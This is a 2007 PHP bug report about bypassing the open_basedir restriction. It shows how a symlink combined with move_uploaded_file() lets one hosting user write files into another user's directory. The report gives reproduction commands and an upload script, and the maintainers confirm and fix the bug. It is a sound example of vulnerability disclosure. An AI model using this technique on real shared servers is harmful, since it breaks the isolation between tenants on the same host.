php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #40931 open_basedir bypass via symlink and move_uploaded_file()
Submitted: 2007-03-27 18:30 UTC Modified: 2007-04-10 22:31 UTC
From: vladimir at petrov dot ks dot ua Assigned: tony2001
Status: Closed Package: Safe Mode/open_basedir
PHP Version: 5.2.1 OS: Linix
Private report: No CVE-ID:
 [2007-03-27 18:30 UTC] vladimir at petrov dot ks dot ua
Description:
------------
User can bypass open_basedir restriction by move_uploaded_file() if target file path is symlink to any directory.



Reproduce code:
---------------
user1 will upload file to user2's /home/user2/public_html folder.

We have in /etc/passwd:
user1:x:32001:32001::/home/user1:/bin/bash
user2:x:32002:32002::/home/user2:/bin/bash

Target folder allows to write for anybody:
# ls -lA /home/user2
drwxrwxrwx  2 user2 user2 4096 Mar 27 17:31 public_html/

Apache have mod_php intalled. Apache config for user1:
<VirtualHost xxx.xxx.xxx.xxx>
ServerName user1.xxxxxxx.com
DocumentRoot /home/user1/public_html
User user1
php_admin_value open_basedir "/home/user1"
</VirtualHost>


User user1 can do something like:

$ cd /home/user1/public_html/
$ ln -s /home/user2/public_html user2_public_html
$ echo '<html><body> 
 
<?
if ( isset($_FILES["userfile"]) ) {
    echo "Upload ";
    if (move_uploaded_file ($_FILES["userfile"]["tmp_name"],"/home/user1/public_html/user2_public_html/file.ext"))
         echo "ok";
    else echo "failed";
}

?> 
 
<form name="uplform" method="post" action="<?=$PHP_SELF?>" enctype="multipart/form-data"> 
<input type="file" name="userfile"> 
<input type="submit"> 
 
</body></html>' > upload.php




Expected result:
----------------
If we access http://user1.xxxxxxx.com/upload.php after file upload expected message
"Upload failed"
and no file 
/home/user2/public_html/file.ext
in target folder.



Actual result:
--------------
If we access http://user1.xxxxxxx.com/upload.php after file upload we got message
"Upload ok"
and file 
/home/user2/public_html/file.ext
well exist in target folder.



Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2007-03-27 18:40 UTC] tony2001@php.net
Make sure the open_basedir option is actually used and not overriden in another way.
 [2007-03-27 19:59 UTC] vladimir at petrov dot ks dot ua
open_basedir actually used.
If I try to write directly to target directory by

move_uploaded_file($_FILES["userfile"]["tmp_name"],"/home/user2/public_html/file.ext")

I got proper error message in browser and in the apache error log.
 [2007-03-27 20:33 UTC] tony2001@php.net
Cannot reproduce.
 [2007-03-27 21:19 UTC] vladimir at petrov dot ks dot ua
I have sent access information to my server to tony2001@php.net
I see this bug really working.
 [2007-04-10 22:31 UTC] tony2001@php.net
This bug has been fixed in CVS.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.
 
Thank you for the report, and for helping us make PHP better.


 
PHP Copyright © 2001-2014 The PHP Group
All rights reserved.
Last updated: Wed Apr 16 13:02:46 2014 UTC